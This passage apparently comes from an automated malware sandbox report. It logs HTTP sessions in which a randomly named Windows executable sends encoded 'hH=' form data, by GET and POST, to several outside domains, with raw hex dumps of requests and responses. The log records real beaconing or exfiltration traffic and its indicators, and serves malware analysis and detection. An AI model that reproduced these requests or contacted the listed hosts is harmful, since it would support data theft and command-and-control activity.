78 64 52 52 70 64 65 55 5a 32 56 52 6f 6d 68 74 76 79 52 6c 69 76 32 30 57 72 30 44 73 57 61 43 63 6e 4f 78 5a 31 44 34 59 38 4e 50 47 33 6f 34 54 55 66 54 74 42 57 70 43 66 35 42 [TRUNCATED]
                Data Ascii: hH=ZTOIBOvNXaSzo1517q76Fvycb6THZY2JDXwUQ801HxHeG1HBK5269fYmC9X0Smp/6VOKOlEy7M1bOPF5HkU+bmf3f3qO1ocfNf8MUqqCN4NjM64Hj6P6sOy6uD78Bz6C/LG4I1iVSEUueQnU4uLAgAOayEBcqY9kSh4otAZ1uUhfVQTvKbBUPpXnEq2CvCe2SSXt0IvJuAYpaLZ8BpM9Vk1KL38jvftxILZggL484LT6yy15uT/RutKE+la19I4qxPlmlmn33/4UDHjrlk1xdRRpdeUZ2VRomhtvyRliv20Wr0DsWaCcnOxZ1D4Y8NPG3o4TUfTtBWpCf5BRgqi283zOE0lRyXshC2jVweiNrPOMp1AjmYaMdz3q9ij8mgHeqlKXWOCk305txVT79PVZ+uQ4ZjTlInMu/v06Hax5V6cNwBxeTkUXf4M1dNJwgM33i/XGGaRjzNYG9lE+Twd8T2atK0w8trASf+NkHpgB6t9zNjGrR7GDCbXGPx8xiOTO8DUDs8vn8kAFZ7U5WNtYMLEygj7Yk1yUPi+85wOV4p0ImL7bO7rD3A43ijnIB6+JiqtEKf60l9DEmx6+tOZzCaVCD5EYM9qBbMvcvlF2GzHETvfrSSfSGeIeSxuXVRx+DMTOcVd8YkpfcSmg6eqN04NX4KkfD5D5H2h+65KSKEbC99HYtLcQB8dSpOhkuORy0WrCoCfIQRa9gOedqOx0YOn/q8Clr7Ihr2ux4UoDNgLPnuF2WJ+kCkaYres6jzDNbFLjvlhUpz5GKLbqhWxUxVCd6aW6Y6nY4I8/cUzJaVw86C52zgpYTKR1ACl1Vmu6JUXtHBdAP9XPoIeiP4RN5DU5yBTHBoZwMnTsTLUODa0h2Hi7L3Rq8dMgiKpa8MiuhyqlS0uuRoHlCEupOTD+98FwuBqLBGw2uENpIIcPt9RvpULqVIwufd4XWDtUIrTXQjyClXpMmAviZ27Cr7DNEyq0qWzoi/fz2H6hieE8gnyvyM59G [TRUNCATED]
                Jul 3, 2024 08:54:21.480178118 CEST434INHTTP/1.1 301 Moved Permanently
                Server: nginx
                Date: Wed, 03 Jul 2024 06:54:21 GMT
                Content-Type: text/html
                Content-Length: 162
                Connection: close
                Location: https://www.ennerdaledevcons.co.uk/4ksh/
                Expires: Wed, 03 Jul 2024 07:14:21 GMT
                Cache-Control: max-age=1200
                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                12192.168.2.949726212.227.172.254801356C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                TimestampBytes transferredDirectionData
                Jul 3, 2024 08:54:23.384319067 CEST480OUTGET /4ksh/?hH=URmoC5X4e6K7wlVx2KbqE9eRaPOmGfPMOnoqB8M3F0zECWK+Sf67ndIbG8DedkN4mAzPYnwe388RaOdlDVpfeljRUUit0IJ1LO15UdugXJNJJasE4A==&4Z=FRPPB0TP0VK82R4 HTTP/1.1
                Host: www.ennerdaledevcons.co.uk
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Jul 3, 2024 08:54:24.028270960 CEST573INHTTP/1.1 301 Moved Permanently
                Server: nginx
                Date: Wed, 03 Jul 2024 06:54:23 GMT
                Content-Type: text/html
                Content-Length: 162
                Connection: close
                Location: https://www.ennerdaledevcons.co.uk/4ksh/?hH=URmoC5X4e6K7wlVx2KbqE9eRaPOmGfPMOnoqB8M3F0zECWK+Sf67ndIbG8DedkN4mAzPYnwe388RaOdlDVpfeljRUUit0IJ1LO15UdugXJNJJasE4A==&4Z=FRPPB0TP0VK82R4
                Expires: Wed, 03 Jul 2024 07:14:23 GMT
                Cache-Control: max-age=1200
                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                13192.168.2.94972791.195.240.19801356C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                TimestampBytes transferredDirectionData
                Jul 3, 2024 08:54:37.153150082 CEST755OUTPOST /9285/ HTTP/1.1
                Host: www.artemhypnotherapy.com
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Accept-Encoding: gzip, deflate, br
                Connection: close
                Cache-Control: max-age=0
                Content-Length: 191
                Content-Type: application/x-www-form-urlencoded
                Origin: http://www.artemhypnotherapy.com
                Referer: http://www.artemhypnotherapy.com/9285/
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Data Raw: 68 48 3d 2b 36 6b 78 4e 59 63 4e 4c 61 39 6f 32 66 44 50 54 6b 4a 70 4b 79 61 53 2b 4b 54 65 46 55 36 32 67 66 65 38 48 31 52 58 32 4a 4e 54 4d 4d 6c 75 37 32 61 71 2f 56 53 2f 62 77 61 68 50 6e 45 54 73 4f 75 69 68 59 58 6e 64 51 49 74 70 65 47 68 6b 42 37 62 54 4a 68 79 48 57 70 77 67 61 37 67 79 31 34 61 63 4f 68 56 4d 77 6a 6a 4a 6a 42 7a 48 7a 53 46 4a 73 50 52 4d 76 69 67 61 79 36 53 69 47 56 6e 31 4c 47 39 4b 6c 2b 33 51 4d 71 61 53 4f 38 35 36 2b 76 34 51 44 55 7a 36 37 38 52 68 30 68 4d 54 4a 78 57 47 53 74 66 2f 49 39 37 42 62 6e 53 33 6e 30 5a 68 41 35 78
                Data Ascii: hH=+6kxNYcNLa9o2fDPTkJpKyaS+KTeFU62gfe8H1RX2JNTMMlu72aq/VS/bwahPnETsOuihYXndQItpeGhkB7bTJhyHWpwga7gy14acOhVMwjjJjBzHzSFJsPRMvigay6SiGVn1LG9Kl+3QMqaSO856+v4QDUz678Rh0hMTJxWGStf/I97BbnS3n0ZhA5x
                Jul 3, 2024 08:54:37.805694103 CEST305INHTTP/1.1 405 Not Allowed
                date: Wed, 03 Jul 2024 06:54:37 GMT
                content-type: text/html
                content-length: 154
                server: Parking/1.0
                connection: close
                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                14192.168.2.94972891.195.240.19801356C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                TimestampBytes transferredDirectionData
                Jul 3, 2024 08:54:39.703690052 CEST779OUTPOST /9285/ HTTP/1.1
                Host: www.artemhypnotherapy.com
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Accept-Encoding: gzip, deflate, br
                Connection: close
                Cache-Control: max-age=0
                Content-Length: 215
                Content-Type: application/x-www-form-urlencoded
                Origin: http://www.artemhypnotherapy.com
                Referer: http://www.artemhypnotherapy.com/9285/
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Data Raw: 68 48 3d 2b 36 6b 78 4e 59 63 4e 4c 61 39 6f 33 37 48 50 51 46 4a 70 4e 53 61 52 37 4b 54 65 50 30 36 36 67 66 43 38 48 78 67 63 32 63 6c 54 4d 6f 70 75 36 79 47 71 2b 56 53 2f 55 51 61 6f 4d 58 45 69 73 4f 69 71 68 63 54 6e 64 52 73 74 70 61 43 68 6c 32 58 63 53 5a 68 77 4c 32 70 79 2b 71 37 67 79 31 34 61 63 4f 46 2f 4d 78 48 6a 4a 51 70 7a 47 57 6d 47 50 63 50 53 62 66 69 67 65 79 36 57 69 47 56 52 31 4f 6d 58 4b 6a 36 33 51 4e 61 61 53 66 38 32 76 75 75 7a 64 6a 56 55 38 72 68 6c 74 47 68 5a 5a 4a 70 50 58 68 5a 50 34 70 64 6c 51 70 75 4a 69 77 30 2b 6d 6e 77 5a 6f 6e 73 57 66 45 43 30 55 58 6c 4b 66 79 6c 4a 4a 77 4e 39 69 67 3d 3d
                Data Ascii: hH=+6kxNYcNLa9o37HPQFJpNSaR7KTeP066gfC8Hxgc2clTMopu6yGq+VS/UQaoMXEisOiqhcTndRstpaChl2XcSZhwL2py+q7gy14acOF/MxHjJQpzGWmGPcPSbfigey6WiGVR1OmXKj63QNaaSf82vuuzdjVU8rhltGhZZJpPXhZP4pdlQpuJiw0+mnwZonsWfEC0UXlKfylJJwN9ig==
                Jul 3, 2024 08:54:40.340322018 CEST305INHTTP/1.1 405 Not Allowed
                date: Wed, 03 Jul 2024 06:54:40 GMT
                content-type: text/html
                content-length: 154
                server: Parking/1.0
                connection: close
                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                15192.168.2.94972991.195.240.19801356C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                TimestampBytes transferredDirectionData
                Jul 3, 2024 08:54:42.247801065 CEST1792OUTPOST /9285/ HTTP/1.1
                Host: www.artemhypnotherapy.com
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Accept-Encoding: gzip, deflate, br
                Connection: close
                Cache-Control: max-age=0
                Content-Length: 1227
                Content-Type: application/x-www-form-urlencoded
                Origin: http://www.artemhypnotherapy.com
                Referer: http://www.artemhypnotherapy.com/9285/
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Data Raw: 68 48 3d 2b 36 6b 78 4e 59 63 4e 4c 61 39 6f 33 37 48 50 51 46 4a 70 4e 53 61 52 37 4b 54 65 50 30 36 36 67 66 43 38 48 78 67 63 32 61 39 54 50 62 68 75 37 54 47 71 39 56 53 2f 64 77 61 6c 4d 58 45 46 73 4e 53 51 68 63 66 64 64 53 45 74 70 2f 57 68 69 44 6a 63 62 5a 68 77 44 57 70 7a 67 61 36 6b 79 31 6f 65 63 4f 56 2f 4d 78 48 6a 4a 57 56 7a 57 7a 53 47 4e 63 50 52 4d 76 69 73 61 79 36 36 69 46 6c 76 31 4f 71 74 4b 54 61 33 51 74 4b 61 65 4e 55 32 79 65 75 78 52 44 56 4d 38 72 74 36 74 47 39 76 5a 4a 64 31 58 68 68 50 37 4d 52 6d 48 4a 53 51 33 44 45 30 67 47 77 65 6e 47 49 66 61 56 76 56 4b 31 39 79 45 42 41 47 4b 6b 49 4b 39 74 50 6a 73 42 6b 41 2f 32 5a 6b 65 74 72 4f 49 45 47 79 2f 6f 2b 5a 79 36 2b 74 70 4c 45 4e 72 4f 4c 79 71 38 66 61 4d 77 31 33 32 69 79 77 6f 34 65 49 47 6e 65 68 38 69 77 51 74 54 76 36 50 38 35 2f 79 79 43 6d 6d 76 79 45 46 4f 41 61 75 74 74 77 76 38 78 30 35 31 48 65 72 4d 51 43 36 65 50 68 78 32 35 54 77 67 39 43 4f 79 75 51 66 7a 4b 38 6c 33 71 7a 4b 71 71 42 69 59 69 [TRUNCATED]
                Data Ascii: hH=+6kxNYcNLa9o37HPQFJpNSaR7KTeP066gfC8Hxgc2a9TPbhu7TGq9VS/dwalMXEFsNSQhcfddSEtp/WhiDjcbZhwDWpzga6ky1oecOV/MxHjJWVzWzSGNcPRMvisay66iFlv1OqtKTa3QtKaeNU2yeuxRDVM8rt6tG9vZJd1XhhP7MRmHJSQ3DE0gGwenGIfaVvVK19yEBAGKkIK9tPjsBkA/2ZketrOIEGy/o+Zy6+tpLENrOLyq8faMw132iywo4eIGneh8iwQtTv6P85/yyCmmvyEFOAauttwv8x051HerMQC6ePhx25Twg9COyuQfzK8l3qzKqqBiYiO3d/Ri1S794WuYcBZ4LjOqft9Pxht2OTwnRpsH6A91T8I25e904KcC7oFc6PHIYl3waA35G7RIKSilN12RQrWNiKJ1uiEwQoQKasyeSizVZMejYE1KJYLoY/bTKZg/ktUYLsj8fdlHLjeKfY6nn4iZgZby1ZLWtBhT9dJUJbD4JKDrCckPpkluCcIn8uqDNFypeluqET52fQLmLxPFqgH9QAJUR30PjyaPGSxHxYwq6ru9jOmVMV2/OQy3MEroILkf9z/MgRAuzoIEH1o3b0JGOQRnOVf1zMVD3iK3OWIkNuNEfv747/bTDKflm1q6q8axEe92zbBFTrq9fc4JU0bBzyI1oc+6u1V5RRSYgbfkMc8ihGtT23vS+QCdMRp6jxkmQcuA0mEGXL1/XtQOPjCh6mNK4qFsLJKDISUaCv+VoDPpoOwv5AKGx8NYqIpbf60fjotug9ACbXfIn3MIOuRvfM6h8jSY2F6PRaQ+AS1PsoNUUQuRXS7w9SJcHp79Cr8OHKfOYdHnOrQmzUOiM84YLkyNyOj5sXYxgtOvgojuPeBYr1U7Vu05incypi9aohEtrCAHi3SsEcZdk4ItYN8H/+II1I1uoOsXq6UAj2mlaoX4Utsm2YwyD/wGMd/PfBKXfwno7+V3VhxX0aQQprc7nUxMCiHqbXlS [TRUNCATED]
                Jul 3, 2024 08:54:42.886197090 CEST305INHTTP/1.1 405 Not Allowed
                date: Wed, 03 Jul 2024 06:54:42 GMT
                content-type: text/html
                content-length: 154
                server: Parking/1.0
                connection: close
                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                16192.168.2.94973091.195.240.19801356C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                TimestampBytes transferredDirectionData
                Jul 3, 2024 08:54:44.777107000 CEST479OUTGET /9285/?hH=z4MROtYNL8tsqryqYVwhIRiC1K/sXlb0hIiORiEdpZxgXp9iqAKh/lqcbyO1AV4s7Ir6nuLseD1viLy4mDmuUoJvGkxfj7PnqEMVCvhqUXK8NAJvVg==&4Z=FRPPB0TP0VK82R4 HTTP/1.1
                Host: www.artemhypnotherapy.com
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Jul 3, 2024 08:54:45.411957979 CEST113INHTTP/1.1 439
                date: Wed, 03 Jul 2024 06:54:45 GMT
                content-length: 0
                server: Parking/1.0
                connection: close


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                17192.168.2.949731109.95.158.122801356C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                TimestampBytes transferredDirectionData
                Jul 3, 2024 08:54:58.567219973 CEST719OUTPOST /prg5/ HTTP/1.1
                Host: www.mocar.pro
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Accept-Encoding: gzip, deflate, br
                Connection: close
                Cache-Control: max-age=0
                Content-Length: 191
                Content-Type: application/x-www-form-urlencoded
                Origin: http://www.mocar.pro
                Referer: http://www.mocar.pro/prg5/
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Data Raw: 68 48 3d 44 57 2b 46 43 6b 64 63 53 65 71 53 55 54 44 64 38 75 65 6f 4c 64 4c 44 45 6d 38 50 39 6f 36 4e 78 42 49 44 5a 6f 4d 51 6b 43 64 64 4a 47 6d 4f 64 50 4f 49 59 65 65 71 69 6b 37 58 55 58 65 4c 66 46 64 43 4b 4f 31 2f 77 48 66 58 2b 35 6d 2f 71 7a 43 52 44 7a 53 48 32 68 49 41 6f 63 49 38 69 6c 32 45 5a 74 75 71 66 75 48 2f 37 70 45 39 64 43 31 67 55 50 6e 6b 71 61 30 61 4b 70 79 72 71 53 2b 6e 79 52 2b 6a 67 54 7a 45 33 6a 4e 39 30 53 48 58 75 50 69 61 52 7a 49 68 53 41 41 6c 77 6d 35 6c 6b 6a 50 73 41 65 44 63 51 54 42 6d 54 56 72 58 4d 66 78 55 2f 45 42 36
                Data Ascii: hH=DW+FCkdcSeqSUTDd8ueoLdLDEm8P9o6NxBIDZoMQkCddJGmOdPOIYeeqik7XUXeLfFdCKO1/wHfX+5m/qzCRDzSH2hIAocI8il2EZtuqfuH/7pE9dC1gUPnkqa0aKpyrqS+nyR+jgTzE3jN90SHXuPiaRzIhSAAlwm5lkjPsAeDcQTBmTVrXMfxU/EB6


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                18192.168.2.949732109.95.158.122801356C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                TimestampBytes transferredDirectionData
                Jul 3, 2024 08:55:01.105330944 CEST743OUTPOST /prg5/ HTTP/1.1
                Host: www.mocar.pro
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Accept-Encoding: gzip, deflate, br
                Connection: close
                Cache-Control: max-age=0
                Content-Length: 215
                Content-Type: application/x-www-form-urlencoded
                Origin: http://www.mocar.pro
                Referer: http://www.mocar.pro/prg5/
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Data Raw: 68 48 3d 44 57 2b 46 43 6b 64 63 53 65 71 53 47 6a 54 64 35 50 65 6f 61 4e 4c 4d 42 6d 38 50 6d 59 37 45 78 41 30 44 5a 70 4a 4e 6a 33 74 64 4a 6d 57 4f 65 4b 69 49 56 2b 65 71 36 55 37 53 62 33 65 45 66 46 68 37 4b 50 4a 2f 77 47 37 58 2b 34 57 2f 71 41 61 53 52 54 53 4a 37 42 49 43 6c 38 49 38 69 6c 32 45 5a 70 47 41 66 71 54 2f 37 63 4d 39 64 6a 31 68 63 76 6e 6e 72 61 30 61 4f 70 79 6e 71 53 2f 4b 79 56 32 4e 67 52 4c 45 33 68 6c 39 36 6a 48 55 37 2f 69 59 4d 44 4a 6c 55 42 30 76 31 55 68 65 75 56 72 76 41 63 44 72 65 53 68 34 43 6e 69 4d 5a 49 78 7a 34 6a 49 53 4f 56 4b 41 37 54 35 72 65 66 6b 4d 61 65 73 67 6f 52 4b 4b 4c 51 3d 3d
                Data Ascii: hH=DW+FCkdcSeqSGjTd5PeoaNLMBm8PmY7ExA0DZpJNj3tdJmWOeKiIV+eq6U7Sb3eEfFh7KPJ/wG7X+4W/qAaSRTSJ7BICl8I8il2EZpGAfqT/7cM9dj1hcvnnra0aOpynqS/KyV2NgRLE3hl96jHU7/iYMDJlUB0v1UheuVrvAcDreSh4CniMZIxz4jISOVKA7T5refkMaesgoRKKLQ==
                Jul 3, 2024 08:55:02.441793919 CEST1236INHTTP/1.1 404 Not Found
                Connection: close
                x-litespeed-tag: 39e_HTTP.404
                expires: Wed, 11 Jan 1984 05:00:00 GMT
                cache-control: no-cache, must-revalidate, max-age=0
                content-type: text/html; charset=UTF-8
                link: <https://mocar.pro/wp-json/>; rel="https://api.w.org/"
                x-et-api-version: v1
                x-et-api-root: https://mocar.pro/wp-json/tribe/tickets/v1/
                x-et-api-origin: https://mocar.pro
                x-tec-api-version: v1
                x-tec-api-root: https://mocar.pro/wp-json/tribe/events/v1/
                x-tec-api-origin: https://mocar.pro
                x-litespeed-cache-control: no-cache
                transfer-encoding: chunked
                content-encoding: br
                vary: Accept-Encoding
                date: Wed, 03 Jul 2024 06:55:02 GMT
                server: LiteSpeed
                Data Raw: 32 33 63 64 0d 0a f4 ff 1b 22 aa 6a 3d 14 51 d1 ea e1 88 d4 ac 1e 00 8d 94 85 f3 f7 8f d0 e1 73 de 97 99 66 6f eb f3 82 90 2a 0a 88 41 90 92 cf a2 82 39 ae 93 ae 14 44 36 29 d8 20 c0 00 ad cb 1c 26 d9 7d ff f3 b7 4c eb cf c9 e5 44 c5 b3 c4 3d 3c 45 a0 c5 b6 3c cb 96 dc fe da c7 bf a8 9e e0 49 62 82 80 06 64 cb ed ca 5f fb 55 96 0f b0 b1 11 96 d9 c5 45 a5 3c b0 ea d7 dd 62 e0 8b 03 a4 c9 ee 1d bf ee d7 30 b0 33 cb 78 77 b3 7b 04 ac 42 20 23 a3 81 58 01 1b 31 f2 ce c8 b8 c8 08 21 e3 ff b7 d6 a7 30 11 2a c2 46 e9 58 55 af aa 02 f3 43 88 0f aa aa 3f ce 0f 01 f9 3d ab f6 c4 45 8a ac 0a 91 34 dd b7 82 d3 61 9c 0d ab 25 f0 2e ec b3 0c a7 53 b9 94 18 41 d3 7f 05 fa 18 aa fd 2f 0a 08 4a 13 c1 d4 cd 64 a8 d9 7c 77 66 07 76 6c 0e 81 10 5b f0 ba 5f f2 4d fe 58 63 67 7b af ba 78 45 7b 9b be 7b f5 19 07 b5 a5 c5 59 ab b5 0e 11 50 d1 25 bf 4b b7 3c 4e 77 a0 68 54 89 a3 c2 88 65 a8 27 28 c6 45 04 59 cc fb 34 69 ac b4 05 35 a7 f4 fe 59 e3 6e 48 00 ab 68 1f 7c 63 2c fc a9 e2 38 62 91 65 6d d7 b7 d2 87 36 db 37 2e 9b [TRUNCATED]
                Data Ascii: 23cd"j=Qsfo*A9D6) &}LD=<E<Ibd_UE<b03xw{B #X1!0*FXUC?=E4a%.SA/Jd|wfvl[_MXcg{xE{{YP%K<NwhTe'(EY4i5YnHh|c,8bem67.#N;1x3@n}D5uN|$}oLS,WL*3?TDYb:XXgeYIRK[i4e!Ho-yzugT$y7f@Qb(B{b{}'5jn5j.A46PdO]66E>K_,
                Jul 3, 2024 08:55:02.441912889 CEST1236INData Raw: f4 a1 2d 3f b2 33 4d 99 55 3e 40 99 11 f8 06 cb 6c 7e 26 73 79 52 66 17 8b fd c5 a2 cc a8 a0 b0 47 5a d0 61 36 2e 02 41 e3 b6 a5 d9 2b 6e db d3 e0 b8 6d 1f 5f cf 8b db 7d f9 4d a8 80 16 03 ad bc ab 34 a2 72 1e ec 20 95 31 b6 cc 76 7d 9a b7 0c 2a
                Data Ascii: -?3MU>@l~&syRfGZa6.A+nm_}M4r 1v}*8<4AvxwA3yFq9~6cH}@~d2#:/b~&gcb=}61>#tqi9~8j{Tr
                Jul 3, 2024 08:55:02.441926003 CEST448INData Raw: ff e3 1e 32 30 5f a4 88 07 0b 71 0d 80 33 62 6a 35 c3 60 56 90 c2 16 1c c6 b4 0f 3e ed 8c 33 a9 dd 14 9b ae ac af 6e 52 c4 a1 69 15 a3 4d ca 8c 03 d5 46 ea d2 a7 56 6e 34 9b 11 c2 09 4b 7a db e9 83 cf 62 a8 b2 00 26 c7 0a 8e 59 15 63 26 04 b3 2a
                Data Ascii: 20_q3bj5`V>3nRiMFVn4Kzb&Yc&*TX-Aikmh&'IjKdrdV4vA=&GG]DeFnVyjd+L75 9e~IsIX"-\H$2>w}mUa9o_8
                Jul 3, 2024 08:55:02.442409992 CEST1236INData Raw: 0f c9 63 46 63 a9 ef e5 57 66 46 0b 41 b1 67 48 71 94 5c 00 69 37 34 19 58 74 de fa 6a 06 af 6f 77 80 6b 00 18 78 56 e7 0c 9a 29 0a 30 2c f2 41 1d db 95 5f 52 9f e1 be 38 d4 0d 1d 0c 76 35 69 86 29 e2 ad 63 3b 1c 86 a3 aa 50 a6 bd ce 26 53 c7 76
                Data Ascii: cFcWfFAgHq\i74XtjowkxV)0,A_R8v5i)c;P&Sv`;G/tvj$i3]z\ar=yMFe64g"0h54(u\RZ1Bo`HZq7=k:; QryWdO$50b{Uiq>p)\
                Jul 3, 2024 08:55:02.442423105 CEST1236INData Raw: 56 11 e3 91 06 ac 1d 49 49 c9 58 56 f0 ad f3 22 65 42 f0 47 96 35 12 b2 8c 90 65 d2 c8 b8 e0 91 48 67 d8 2c a9 a5 6c 0f 39 43 22 85 82 2c 2d 96 26 09 8f 79 cd d2 e4 41 c9 95 b6 54 f8 cb f3 34 54 2a 47 11 36 06 7f 2c 20 40 9a e1 8d 0c 96 06 df 38
                Data Ascii: VIIXV"eBG5eHg,l9C",-&yAT4T*G6, @88{zM' B(iGIJH_@,0dBdJfpfVT8>+NcwEuQ>~_-#{0\=\jgyD=ss|QgNW
